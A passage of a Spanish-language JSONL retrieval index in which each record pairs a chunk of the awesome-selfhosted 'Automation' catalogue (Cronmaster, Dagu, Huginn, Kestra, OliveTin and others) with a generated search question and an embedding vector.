-0.00967, 0.01085, 0.06854, 0.10534, -0.03571, 0.02632, -0.01849, 0.00939, -0.11758, -0.0076, -0.01324, -0.05601, -0.00939, 0.03857, 0.04114, 0.02418, 0.05798, -0.01175]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Cronmaster β€” Cronjob management UI with human readable syntax, live logging and log history for your cronjobs [AGPL-3.0, Docker]. Dagu β€” Powerful Cron alternative with a Web UI. It allows you to define dependencies between commands as a Directed Acyclic Graph (DAG) in a declarative YAML format [GPL-3.0, Go/Docker]. Discount Bandit β€” Track pricing, stock status of products across multiple stores such as Amazon, Ebay, Walmart, etc [⚠, GPL-3.0, PHP/Docker]. Dittofeed β€” Omni-channel customer engagement and messaging automation platform (alternative to Braze, Customer.io, Iterable) [MIT, Docker]. feedmixer β€” Micro web service which takes a list of feed URLs and returns a new feed consisting of the most recent n entries from each given feed (returns Atom, RSS, or JSON) [WTFPL, Python]. flowctl β€” Self-service workflow execution platform with approvals, remote execution and scheduling [Apache-2.0, Go/Docker].", "indexar": "quΓ© herramienta sirve para gestionar tareas programadas con una interfaz web y registro en tiempo real?", "v": [0.02269, 0.14566, -0.15136, -0.24553, 0.13133, -0.13211, -0.05128, 0.00276, 0.02713, -0.01611, -0.0508, -0.07968, 0.06781, -0.05183, 0.11118, 0.14482, 0.12139, -0.09508, 0.00728, -0.00574, -0.05098, 0.02764, -0.06343, 0.01264, -0.11513, -0.06315, 0.10351, -0.08116, -0.16521, 0.11331, -0.00113, 0.01376, 0.09643, -0.15808, -0.03004, -0.00799, -0.00812, 0.11457, -0.03211, 0.02341, 0.02314, 0.09393, -0.10734, 0.11946, 0.10833, 0.00307, 0.04436, -0.06831, -0.00893, 0.04634, -0.06855, -0.13693, -0.0461, 0.03955, -0.02388, -0.10768, 0.15384, -0.17473, -0.02126, -0.11667, -0.17198, 0.07392, -0.0711, 0.04243, 0.03749, -0.03102, 0.04912, 0.03244, -0.01362, 0.0707, 0.01707, 0.03527, 0.01796, -0.08359, 0.03948, -0.03676, 0.03969, 0.04705, 0.05077, -0.01129, 0.04918, -0.01402, -0.0564, 0.08086, -0.04797, -0.08564, 0.03515, -0.06358, -0.02969, -0.08988, 0.01135, 0.0994, -0.04229, -0.02427, 0.07675, 0.01967, 0.0712, -0.01554, 0.05996, 0.02801, 0.08228, -0.02417, -0.12694, 0.09334, -0.05128, 0.10489, -0.00917, -0.03304, -0.0709, -0.00394, 0.0056, -0.00961, -0.04187, -0.03594, -0.0085, 0.098, 0.01908, -0.07197, 0.03496, -0.06682, -0.02639, 0.03929, -0.00816, -0.0112, 0.03429, -0.00811, -0.00643, 0.07266, 0.02898, -0.05907, -0.03689, -0.061, -0.10504, -0.03221, -0.02211, -0.01219, -0.03637, -0.02707, 0.02129, -0.10403, -0.02125, 0.09662, -0.04246, -0.07019, 0.00459, 0.01669, 0.01951, -0.0595, -0.05617, 0.01234, 0.06581, -0.07186, 0.03276, 0.09026, -0.04972, 0.01906, -0.06556, 0.03851, -0.11141, -0.00437, -0.03146, -0.02936, -0.00808, -0.00255, 0.03086, -0.09187, -0.02882, 0.08193, 0.08476, 0.07201, 0.00925, 0.05216, 0.1003, -0.06592, 0.00339, -0.01983, -0.00961, -0.0393, 0.00998, -0.05232, -0.03786, 0.00274, 0.06276, 0.02461, -0.0277, -0.04949, -0.05872, 0.03192, -0.05145, 0.02789, 0.0234, 0.02309, 0.03455, -0.02174, 0.07525, 0.03726, -0.02975, -0.03889, 0.01052, -0.04036, 0.00485, -0.07626, 0.03853, -0.00431, -0.0081, 0.12437, -0.01453, 0.04165, 0.0472, 0.04851, 0.0169, 0.00596, 0.03107, -0.00607, -0.0156, -0.02451, -0.00247, -0.02187, 0.00723, -0.01763, 0.01986, -0.01099, 0.02878, -0.02396, -0.00964, -0.02049, 0.04243, 0.04689, 0.01356, 0.01531, -0.04058, -0.01933, -0.00829, 0.01266, 0.01938, -0.05637, 0.03813, -0.0421, -0.03458, -0.0631, -0.01261, 0.04832, 0.01038, -0.01897, -0.05411, -0.02576, -0.05203, -0.00764, -0.01375, -0.06559, -0.09116, -0.00971, 0.07652, 0.0186, 0.03057, -0.01784]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Cronmaster β€” Cronjob management UI with human readable syntax, live logging and log history for your cronjobs [AGPL-3.0, Docker]. Dagu β€” Powerful Cron alternative with a Web UI. It allows you to define dependencies between commands as a Directed Acyclic Graph (DAG) in a declarative YAML format [GPL-3.0, Go/Docker]. Discount Bandit β€” Track pricing, stock status of products across multiple stores such as Amazon, Ebay, Walmart, etc [⚠, GPL-3.0, PHP/Docker]. Dittofeed β€” Omni-channel customer engagement and messaging automation platform (alternative to Braze, Customer.io, Iterable) [MIT, Docker]. feedmixer β€” Micro web service which takes a list of feed URLs and returns a new feed consisting of the most recent n entries from each given feed (returns Atom, RSS, or JSON) [WTFPL, Python]. flowctl β€” Self-service workflow execution platform with approvals, remote execution and scheduling [Apache-2.0, Go/Docker].", "indexar": "con quΓ© puedo montar un servicio de automatizaciΓ³n que permita definir dependencias entre comandos?", "v": [0.21377, 0.15297, -0.12762, -0.14823, -0.0217, -0.02093, 0.04917, -0.01195, -0.26489, -0.04383, -0.13531, 0.00226, 0.04866, -0.13286, 0.04838, 0.11156, 0.09151, -0.05713, -0.03148, 0.06391, 0.09236, -0.08363, 0.04229, 0.01589, -0.0572, 0.05207, 0.10335, -0.08113, -0.22288, -0.0519, 0.05747, 0.04268, 0.00326, -0.02527, 0.03574, -0.04946, -0.09317, 0.06225, 0.02065, 0.03173, -0.07544, -0.03298, -0.05692, 0.03653, 0.02771, -0.07011, -0.01452, -0.02462, 0.02989, -0.07467, 0.00681, -0.06282, -0.05133, -0.03096, -0.08629, -0.02516, 0.182, -0.02498, 0.00875, 0.00518, -0.03092, -0.04742, 0.00733, 0.11181, 0.02868, 0.01036, -0.01252, -0.07755, -0.04664, 0.07837, -0.03842, -0.05857, -0.08279, 0.0222, 0.06175, 0.08953, -0.07675, -0.03829, 0.1366, 0.01792, 0.06608, 0.04752, -0.10203, 0.07765, -0.03696, -0.05761, -0.03895, -0.03144, 0.01956, -0.00739, 0.01329, 0.03625, -0.01211, 0.03256, 0.00875, 0.03374, 0.00248, 0.10548, 0.08022, 0.08179, 0.00441, 0.02319, -0.09513, 0.19608, 0.03829, -0.01172, 0.11535, -0.09045, 0.07598, -0.06636, 0.03368, -0.01036, -0.02016, -0.04598, -0.09235, -0.09195, -0.03568, -0.0134, -0.04887, -0.03535, -0.08412, 0.06875, 0.16038, 0.02417, 0.01267, -0.0578, 0.03277, 0.14235, 0.0115, -0.02962, 0.02054, 0.00609, 0.00258, -0.0634, -0.00602, 0.12242, 0.02733, -0.00421, -0.08973, -0.06459, 0.01106, 0.00433, 0.04034, -0.03896, 0.03071, 0.02642, 0.02642, -0.08694, -0.03801, -0.0092, 0.01454, 0.04553, -0.04907, 0.02204, -0.04483, 0.00209, -0.01668, -0.09472, 0.03901, 0.10234, -0.01452, -0.03338, -0.03119, -0.01193, 0.04327, -0.01452, -0.02327, 0.03626, 0.02473, 0.00561, -0.03878, 0.02708, -0.04116, -0.01093, 0.01819, -0.00272, -0.0575, -0.01225, 0.03001, 0.01525, -0.01944, -0.00853, -0.08552, -0.01789, -0.00144, -0.02451, -0.0683, -0.05343, -0.0298, 0.021, -0.05095, 0.01508, -0.02123, -0.0386, 0.05783, -0.05272, 0.01589, 0.02108, -0.05511, -0.02292, -0.05313, 0.0058, -0.01155, -0.01918, -0.02225, 0.04213, -0.0159, 0.13044, 0.02462, 0.05297, 0.02338, 0.00363, 0.02877, -0.07308, -0.02063, -0.01363, -0.01038, -0.02873, -0.03316, -0.01758, 0.03369, -0.03643, 0.05046, -0.04157, 0.05238, 0.03574, 0.05576, 0.0564, 0.0976, -0.00453, -0.04336, 0.00959, -0.01437, -0.02973, 0.01354, 0.00743, 0.02278, -0.02957, -0.00617, -0.06433, 0.02309, 0.07272, -0.04156, -0.10219, -0.07212, -0.07346, -0.08892, -0.00145, -0.05624, -0.02687, -0.00915, 0.0431, -0.01472, -0.04124, -0.04119, -0.0588]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Cronmaster β€” Cronjob management UI with human readable syntax, live logging and log history for your cronjobs [AGPL-3.0, Docker]. Dagu β€” Powerful Cron alternative with a Web UI. It allows you to define dependencies between commands as a Directed Acyclic Graph (DAG) in a declarative YAML format [GPL-3.0, Go/Docker]. Discount Bandit β€” Track pricing, stock status of products across multiple stores such as Amazon, Ebay, Walmart, etc [⚠, GPL-3.0, PHP/Docker]. Dittofeed β€” Omni-channel customer engagement and messaging automation platform (alternative to Braze, Customer.io, Iterable) [MIT, Docker]. feedmixer β€” Micro web service which takes a list of feed URLs and returns a new feed consisting of the most recent n entries from each given feed (returns Atom, RSS, or JSON) [WTFPL, Python]. flowctl β€” Self-service workflow execution platform with approvals, remote execution and scheduling [Apache-2.0, Go/Docker].", "indexar": "cuΓ‘l es una alternativa libre a plataformas como Braze o Customer.io para la automatizaciΓ³n del cliente?", "v": [0.11617, 0.03536, 0.03427, -0.05032, -0.05504, -0.1351, 0.00444, -0.0574, -0.2425, -0.06859, -0.10127, -0.22739, 0.0158, 0.08107, 0.07378, -0.03765, 0.01151, -0.0585, 0.03031, 0.04866, -0.00326, -0.01289, -0.15491, -0.03868, -0.1438, -0.06431, -0.00407, 0.00975, -0.22192, 0.08119, -0.01628, -0.14739, 0.06104, -0.02311, 0.05933, -0.15619, 0.09139, 0.08766, 0.07011, -0.01303, 0.02463, -0.09464, 0.05735, 0.08901, 0.09978, 0.05931, 0.03924, 0.00153, -0.02082, 0.07324, -0.0945, -0.05459, -0.16346, 0.00502, 0.11042, -0.01671, 0.15005, -0.12752, 0.05838, -0.09705, -0.00064, 0.06675, 0.13308, 0.0215, 0.00701, 0.01441, 0.01961, 0.00241, 0.03985, 0.10887, 0.07728, -0.04853, -0.01069, -0.07585, -0.0221, 0.11717, -0.01179, 0.01576, -0.03017, 0.03781, 0.08615, -0.00036, -0.12174, -0.02103, 0.01747, -0.01775, 0.07069, -0.06694, -0.03154, 0.02719, 0.05079, 0.00549, 0.03264, 0.07958, 1e-05, -0.08322, 0.00102, -0.0402, -0.06238, 0.02725, -0.04756, 0.05374, -0.08982, 0.01693, -0.05018, -0.01919, -0.00077, -0.06894, -0.11219, -0.01356, 0.01139, 0.01747, 0.00839, 0.00054, -0.06967, -0.02997, 0.03954, 0.01262, 0.07779, 0.01404, 0.0239, 0.01126, 0.04121, -0.10674, 0.00662, 0.05848, 0.00461, 0.14209, -0.05138, -0.09185, 0.02602, -0.06099, -0.06183, -0.04606, -0.00693, 0.021, 0.12657, -0.03377, 0.00075, -0.01777, -0.06705, 0.01893, 0.01315, -0.04013, 0.14904, -0.12997, 0.02125, -0.05643, -0.01334, 0.00963, -0.06455, -0.00327, -0.0139, 0.0188, -0.03661, -0.07091, 0.03567, -0.05581, -0.00808, 0.12466, 0.05047, -0.05367, 0.0184, 0.04249, 0.00383, -0.04948, -0.02468, 0.05115, -0.00896, -0.00171, 0.04838, 0.07688, 0.02243, -0.05448, 0.02196, -0.01303, -0.01175, -0.01054, -0.00133, -0.03805, 0.00099, -0.01832, -0.0062, -0.01255, 0.02809, -0.0456, 0.04358, -0.03942, 0.01717, 0.07388, -0.08818, 0.01164, -0.10258, -0.03593, 0.0281, -0.00972, -0.00281, 0.00438, -0.063, -0.0081, -0.07335, -0.03214, 0.01867, -0.04894, -0.04452, 0.06651, 0.02212, 0.06292, 0.0392, 0.01245, 0.02095, -0.03027, 0.07217, -0.03673, 0.00738, -0.01203, -0.03753, -0.03303, -0.00313, -0.06794, -0.01033, -0.00108, -0.03333, 0.02284, -0.06203, 0.07737, 0.06038, 0.07131, -0.0409, -0.02503, 0.00652, -0.05197, 0.00725, 0.00578, 0.00193, 0.00605, 0.02548, -0.04117, -0.00668, -0.04478, 0.04113, 0.04997, -0.00498, -0.01796, -0.04434, 0.02481, -0.07146, -0.02533, -0.04883, -0.06278, -0.04609, -0.0012, 0.02182, 0.00908, -0.00697, 0.01449]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Fredy β€” Searches for new apartments, houses, and flats in Germany on platforms like ImmoScout24, Immowelt, and others, and instantly delivers the results to you via Slack, Telegram, and more [⚠, Apache-2.0, Nodejs/Docker]. gocron β€” Task scheduler that allows users to specify recurring jobs via a simple YAML configuration file [MIT, Docker]. HandBrake Web β€” Use one or more instances of HandBrake video transcoder on a headless device via a web interface [AGPL-3.0, Docker]. Healthchecks β€” Listen for pings and sends alerts when pings are late [BSD-3-Clause, Python/Docker]. HomeButler β€” Homelab management tool for monitoring hosts, Docker services, Wake-on-LAN, inventory, and remote operations, with a web dashboard and MCP integrations [MIT, Docker/Go]. Huginn β€” Build agents that monitor and act on your behalf [MIT, Ruby]. Kestra β€” Event-driven, language-agnostic platform to create, schedule, and monitor workflows. In code. Coordinate data pipelines and tasks such as ETL and ELT [Apache-2.0, Docker].", "indexar": "quΓ© herramienta me permite crear tareas recurrentes configurando un archivo simple?", "v": [0.09331, 0.12936, -0.13418, -0.21308, 0.08555, -0.13908, -0.03618, 0.02753, -0.0823, -0.07028, -0.16103, -0.03812, 0.02282, -0.08812, 0.1269, 0.06055, 0.12494, -0.07723, 0.06136, -0.00367, -0.02915, -0.03491, -0.07283, 0.00385, -0.1022, -0.1059, 0.08017, -0.02074, -0.20578, 0.06069, 0.00915, 0.10979, 0.11314, -0.01874, -0.08454, 0.06459, -0.03075, 0.08379, -0.14058, 0.04448, -0.01763, 0.03806, -0.13077, 0.16987, -0.00452, -0.02471, 0.06034, -0.01383, 0.02772, 0.14001, 0.02641, -0.11342, -0.09785, 0.00141, 0.02739, -0.0954, 0.21025, -0.21639, 0.03115, -0.10573, -0.10583, 0.10383, -0.05434, -0.00672, -0.01059, -0.05094, 0.02718, -0.04159, -0.01956, 0.12837, -0.01318, 0.0292, 0.03642, -0.02007, 0.03891, 0.02796, -0.04639, -0.08245, 0.01524, 0.00178, 0.03607, -0.03184, -0.06149, -0.04966, -0.07689, -0.11754, 0.01139, 0.02227, 0.04081, -0.08279, 0.00317, -0.00892, 0.02501, 0.03238, 0.05025, 0.01714, 0.05837, 0.04445, -0.02004, -0.01443, 0.01422, -0.02467, -0.07195, 0.10035, -0.01049, 0.04665, -0.03888, 0.0248, -0.09652, -0.06258, 0.03147, -0.00365, 0.07444, 0.03591, -0.00549, 0.03692, 0.03404, 0.01705, 0.05295, -0.08665, 0.05492, 0.05904, -0.01243, 0.04313, -0.03861, -0.04212, -0.01086, 0.08925, -0.03442, -0.01883, 0.00314, -0.03075, -0.06723, -0.02549, -0.03633, -0.01318, 0.06316, -0.08393, -0.05087, -0.14606, 0.04655, 0.04239, -0.01565, -0.05378, 0.052, 0.04156, -0.00154, -0.04825, -0.02973, 0.01541, -0.00437, -0.05578, -0.01974, -0.03591, -0.0798, 0.05065, -0.03375, -0.03755, -0.07478, 0.02588, -0.02415, -0.00842, 0.05276, 0.01112, 0.00547, -0.11674, 0.00242, 0.02722, 0.05782, -0.00466, -0.03028, -0.05667, 0.06229, -0.11545, 0.00626, -0.07001, -0.02421, -0.03677, 0.01571, -0.00495, -0.0634, 0.00828, 0.05185, 0.03436, -0.00779, -0.11732, 0.03473, 0.02365, -0.00667, 0.02676, -0.0329, 0.02195, 0.01206, -0.06522, 0.07486, 0.00453, -0.04746, -0.06804, -0.01664, 0.04023, -0.00919, -0.06312, 0.01158, -0.0165, 0.02231, 0.03652, -0.08374, 0.00528, 0.01879, 0.01003, 0.06008, -0.00861, 0.05912, -0.00106, 0.01096, 0.03312, 0.00639, -0.01096, 0.01373, -0.04836, 0.02852, -0.0183, 0.07432, -0.04794, 0.02657, 0.04003, 0.02539, 0.05859, 0.01386, -0.04369, 0.03069, -0.0203, -0.02676, -0.01869, 0.0471, -0.06939, 0.01543, -0.02291, -0.00386, 0.02305, 0.02405, 0.03407, 0.02926, -0.01773, -0.02663, 0.00734, -0.00473, 0.00405, -0.07691, -0.04938, -0.05449, -0.02494, 0.01734, -0.04053, 0.01038, -0.04661]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Fredy β€” Searches for new apartments, houses, and flats in Germany on platforms like ImmoScout24, Immowelt, and others, and instantly delivers the results to you via Slack, Telegram, and more [⚠, Apache-2.0, Nodejs/Docker]. gocron β€” Task scheduler that allows users to specify recurring jobs via a simple YAML configuration file [MIT, Docker]. HandBrake Web β€” Use one or more instances of HandBrake video transcoder on a headless device via a web interface [AGPL-3.0, Docker]. Healthchecks β€” Listen for pings and sends alerts when pings are late [BSD-3-Clause, Python/Docker]. HomeButler β€” Homelab management tool for monitoring hosts, Docker services, Wake-on-LAN, inventory, and remote operations, with a web dashboard and MCP integrations [MIT, Docker/Go]. Huginn β€” Build agents that monitor and act on your behalf [MIT, Ruby]. Kestra β€” Event-driven, language-agnostic platform to create, schedule, and monitor workflows. In code. Coordinate data pipelines and tasks such as ETL and ELT [Apache-2.0, Docker].", "indexar": "hay alguna alternativa libre para automatizar la bΓΊsqueda de propiedades y notificar los resultados en Telegram o Slack?", "v": [-0.15589, 0.07813, -0.1789, -0.21712, 0.01696, -0.13263, -0.11448, -0.02854, -0.05883, 0.05358, -0.07639, -0.21105, 0.15381, 0.02764, 0.10234, 0.06882, -0.01857, -0.22944, 0.05565, 0.03421, -0.00851, 0.0421, -0.19184, -0.13907, 0.01509, -0.07145, 0.02223, 0.03627, -0.07567, 0.01047, -0.04029, -0.04063, 0.05061, -0.05914, -0.04801, 0.08555, 0.20403, -0.05589, 0.07334, -0.01629, 0.01797, 0.01274, -0.07104, -0.0124, -0.05296, 0.02779, -0.14417, -0.01018, -0.02009, -0.08629, -0.05982, -0.07031, -0.0987, 0.09249, -0.00798, 0.03707, 0.14284, -0.02675, 0.09044, -0.08458, -0.06737, 0.0005, 0.02365, 0.0214, 0.02416, 0.04008, 0.08366, 0.06185, 0.09684, 0.09631, 0.11889, 0.00409, -0.02888, 0.05084, -0.0579, 0.13324, -0.07732, 0.01619, -0.05285, 0.07289, -0.01836, -0.04812, -0.00183, 0.00699, -0.04801, -0.08844, 0.03746, -0.10652, -0.00765, -0.01846, -0.02918, 0.06378, 0.04463, 0.12744, -0.02642, -0.02758, -0.01708, -0.07554, -0.02209, 0.11939, 0.0803, -0.03524, -0.0632, 0.05733, 0.01686, -0.02648, -0.01961, -0.03421, 0.00631, 0.02914, -0.04175, -0.02692, 0.03671, 0.07827, -0.06256, -0.002, -0.00084, -0.091, 0.02945, 0.01317, -0.03902, -0.00599, -0.01102, -0.03933, 0.01695, -0.08187, 0.02335, 0.01553, -0.00027, 0.00218, 0.08734, 0.01851, -0.11152, -0.16078, -0.014, 0.09546, 0.01895, 0.00555, 0.02069, -0.06153, -0.03432, 0.01361, 0.00629, -0.05591, 0.0224, 0.00343, -0.03517, -0.02778, -0.0168, 0.03961, 0.00769, -0.11644, 0.01626, -0.00434, -0.03237, 0.02607, -0.01677, -8e-05, 0.01568, 0.0541, -0.00521, -0.00372, -0.07307, 0.04394, -0.01128, -0.01264, 0.08274, 0.00621, -0.08181, -0.01195, 0.0577, -0.00675, 0.06945, -0.10268, -0.06595, -0.01848, 0.05079, 0.08579, 0.03828, -0.03444, 0.03315, 0.01449, -0.05326, -0.02839, 0.06143, -0.01396, -0.01566, -0.01407, 0.01471, 0.05413, -0.06855, -0.005, -0.04555, -0.03847, 0.00583, 0.05288, -0.01385, -0.06316, 0.02673, -0.05155, -0.10113, -0.00319, -0.01312, 0.03, -0.01976, 0.0212, 0.02942, -0.01122, 0.06429, 0.03225, -0.00998, -0.01967, 0.06439, 0.05704, -0.04183, 0.01244, 0.02415, -0.01505, 0.03808, 0.02979, 0.03236, -0.0162, 0.01581, -0.00316, 0.01576, 0.03301, -0.03478, 0.06037, -0.00218, 0.0278, 0.00885, -0.00335, 0.03905, 0.02037, 0.03174, -0.04724, 0.0003, -0.0029, 0.01083, 0.0094, -0.02398, 0.03328, 0.05497, 0.06623, -0.0543, 0.01206, -0.07976, -0.01952, -0.04428, -0.03489, 0.05368, 0.02444, -0.00018, -0.01023, 0.01496, -0.00346]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Fredy β€” Searches for new apartments, houses, and flats in Germany on platforms like ImmoScout24, Immowelt, and others, and instantly delivers the results to you via Slack, Telegram, and more [⚠, Apache-2.0, Nodejs/Docker]. gocron β€” Task scheduler that allows users to specify recurring jobs via a simple YAML configuration file [MIT, Docker]. HandBrake Web β€” Use one or more instances of HandBrake video transcoder on a headless device via a web interface [AGPL-3.0, Docker]. Healthchecks β€” Listen for pings and sends alerts when pings are late [BSD-3-Clause, Python/Docker]. HomeButler β€” Homelab management tool for monitoring hosts, Docker services, Wake-on-LAN, inventory, and remote operations, with a web dashboard and MCP integrations [MIT, Docker/Go]. Huginn β€” Build agents that monitor and act on your behalf [MIT, Ruby]. Kestra β€” Event-driven, language-agnostic platform to create, schedule, and monitor workflows. In code. Coordinate data pipelines and tasks such as ETL and ELT [Apache-2.0, Docker].", "indexar": "con quΓ© programa puedo gestionar mis servidores, servicios Docker e inventario desde una interfaz web?", "v": [0.04507, 0.04713, -0.06181, -0.21782, 0.07982, -0.11096, 0.06971, -0.07049, -0.15463, -0.07233, -0.06678, -0.1129, -0.00857, -0.16079, 0.03295, 0.09938, 0.22674, -0.16651, 0.07217, 0.0886, 0.01307, 0.11094, 0.02347, -0.00402, -0.16079, -0.00613, -0.02296, -0.13137, -0.07154, 0.04794, -0.01393, -0.12298, 0.07982, -0.09443, 0.00471, -0.03502, 0.03045, 0.18471, 0.03023, 0.02167, 0.08751, 0.04804, -0.09249, 0.00012, 0.08767, -0.07805, 0.0551, -0.10503, 0.09045, 0.01288, -0.06584, -0.12157, -0.05324, 0.02765, 0.00161, 0.00106, 0.04553, -0.1362, 0.05491, 0.04662, -0.11405, 0.06879, -0.04704, 0.00974, 0.08716, -0.07642, -0.00328, -0.00306, -0.00235, 0.07504, -0.06304, 0.0652, 0.03735, -0.05615, 0.02608, 0.02662, -0.05337, 0.02522, 0.09698, 0.04924, 0.00906, 0.02818, -0.01465, 0.11607, -0.07921, -0.06402, 0.01054, -0.04935, -0.00689, -0.03795, 0.07968, 0.05721, -0.06685, 0.01849, 0.00139, -0.00461, 0.09619, 0.0211, 0.00981, -0.00994, 0.07257, 0.06947, -0.1116, 0.12316, -0.04393, 0.10964, 0.09198, -0.02375, -0.05722, -0.02941, -0.03719, -0.07666, -0.04398, -0.01734, -0.06391, 0.0267, -0.00319, 0.00642, 0.05665, -0.01678, -0.05714, -0.00091, 0.02754, 0.06251, 0.12771, -0.05305, 0.0603, 0.08358, 0.02155, -0.01771, 0.00273, -0.04799, -0.06673, -0.0829, -0.02665, -0.03064, -0.04255, -0.04427, 0.05686, -0.06162, -0.0611, 0.04011, 0.00093, 0.06679, 0.06106, -0.0307, 0.08647, -0.06654, -0.02025, 0.02989, 0.03469, -0.00987, -0.01066, 0.04779, -0.07643, -0.04016, 0.03497, -0.03428, -0.12311, -0.01739, -0.00653, -0.00371, -0.00426, 0.05756, 0.0416, 0.00714, -0.06128, 0.06263, 0.05016, 0.02934, -0.05653, 0.01999, 0.05653, -0.07089, -0.01994, 0.0187, -0.0558, -0.07692, 0.09533, 0.00631, -0.00648, -0.02051, 0.05048, 0.04322, -0.09239, -0.08113, -0.10293, 0.04162, -0.03979, -0.02279, 0.00362, 0.04842, -0.02834, 0.00684, 0.09502, -0.01188, -0.03915, 0.0229, -0.04208, -0.02956, 0.00548, -0.03464, -0.00211, -0.01017, -0.03876, 0.07064, -0.01102, 0.04691, 0.03398, 0.05883, -0.02388, 0.00136, 0.09643, -0.02893, -0.03103, -0.01788, 0.0526, -0.01288, 0.05487, -0.03608, 0.01514, 0.00808, 0.03056, 0.01745, 0.00283, -0.04439, 0.01599, 0.02685, 0.04128, 0.04266, -0.02363, -0.03712, 0.01967, -0.03067, -0.02125, -0.03747, 0.02908, -0.06431, -0.01751, -0.05956, -0.02559, 0.09114, 0.00596, -0.05326, 0.03213, -0.04667, -0.06315, 0.00807, -0.00248, -0.01631, -0.03268, 0.04455, 0.03842, 0.01216, -0.02275, -0.0076]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Kibitzr β€” Lightweight personal web assistant with powerful integrations [MIT, Python]. LazyLibrarian β€” Follow authors and grab metadata for all your digital reading needs. It uses a combination of Goodreads, Librarything and optionally GoogleBooks as sources for author info and book info [⚠, GPL-3.0, Python]. Leon β€” Personal assistant who can live on your server [MIT, Nodejs]. Matchering β€” Automated music mastering (alternative to LANDR, eMastered and MajorDecibel) [GPL-3.0, Docker]. Mylar3 β€” Automated Comic Book (cbr/cbz) downloader program for use with NZB and torrents [GPL-3.0, Python/Docker]. OliveTin β€” Web interface for running Linux shell commands [AGPL-3.0, Go]. pyLoad β€” Lightweight, customizable and remotely manageable downloader for 1-click-hosting sites like rapidshare.com or uploaded.to [AGPL-3.0, Python].", "indexar": "que programa puedo usar para gestionar metadatos de libros como Goodreads?", "v": [-0.12197, 0.06634, -0.09952, -0.17235, 0.02191, -0.00652, -0.08055, 0.04025, -0.09294, -0.1482, -0.12135, -0.11489, -0.06106, -0.02437, -0.06329, -0.02957, 0.09439, -0.08444, 0.02537, -0.00241, 0.04431, -0.02712, -0.03484, -0.07319, -0.00223, 0.02048, 0.15821, -0.06894, 0.04265, 0.08329, -0.05844, -0.02337, 0.03179, -0.18951, -0.1209, -0.03342, 0.00954, 0.10203, 0.04478, 0.0724, -0.03968, 0.06929, 0.04825, 0.01108, 0.18482, -0.03932, 0.1248, -0.06731, -0.11829, 0.0215, -0.00931, -0.04944, -0.08274, -0.04093, 0.10618, -0.03259, -0.04116, -0.12337, -0.16881, 0.03112, -0.0453, 0.07915, 0.06077, 0.01613, 0.03654, -0.03883, 0.09907, 0.05213, -0.12001, 0.11803, -0.02868, 0.00658, -0.01128, -0.00287, 0.00033, 0.01005, 0.02383, 0.01022, 0.05911, 0.03632, 0.00354, -0.0532, 0.03729, 0.05149, -0.05704, -0.06891, 0.02167, -0.08239, 0.01141, -0.00177, -0.07408, -0.07139, -0.00066, -0.08284, 0.06538, -0.04042, 0.07619, -0.04523, 0.00088, 0.02901, 0.09976, -0.03769, -0.04903, 0.12141, -0.11328, 0.02619, 0.00173, -0.00893, -0.00632, 0.03138, -0.02708, 0.00855, -0.00867, -0.02874, -0.08053, 0.05039, 0.06643, -0.06103, 0.12187, -0.01773, -0.10991, -0.0453, -0.05621, 0.04399, 0.19795, 0.06772, 0.10222, 0.09596, -0.05208, 0.0893, -0.0366, -0.02589, -0.01559, -0.02851, -0.13148, -0.06341, -0.03184, -0.00103, -0.00622, -0.09374, -0.05016, 0.05705, -0.01792, 0.08232, -0.03576, -0.07228, -0.05804, -0.02907, 0.08804, -0.00441, 0.08215, -0.04836, 0.03849, 0.0617, -0.01938, 0.01784, 0.06997, -0.0305, -0.07829, -0.02225, -0.06814, -0.00758, 0.001, 0.03937, 0.02662, -0.02388, 0.02857, 0.03698, 0.02163, 0.07552, -0.01298, 0.07438, 0.03781, 0.00017, 0.0575, -0.00592, -0.00992, -0.02703, 0.00476, 0.03992, -0.07719, 0.01548, 0.05928, 0.00848, -0.02502, -0.05506, -0.03764, 0.04331, -0.03869, -0.02713, -0.02269, 0.07278, 0.09918, -0.05306, 0.01786, 0.01234, -0.03702, 0.05509, 0.01776, -0.06745, -0.06863, 0.00446, -0.02034, 0.04531, 0.08396, 0.02782, -0.07245, 0.08071, 0.05447, 0.08453, -0.02851, -0.04073, 0.02905, 0.00754, -0.03282, -0.03902, -0.08769, 0.05312, 0.01747, -0.0098, 0.00398, -0.03612, 0.03802, 0.07096, -0.00047, -0.09946, -0.00624, -0.01034, 0.0197, 0.01811, -0.039, -0.06483, 0.03147, 0.05037, -0.04464, -0.04014, 0.0143, -0.01818, 0.03595, 0.00533, -0.04994, 0.0844, 0.03895, -0.03692, -0.02266, 0.02558, -0.09664, 0.05743, -0.01772, 0.02443, -0.01108, -0.00639, 0.0232, -0.0112, 0.04808, 0.05216]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", 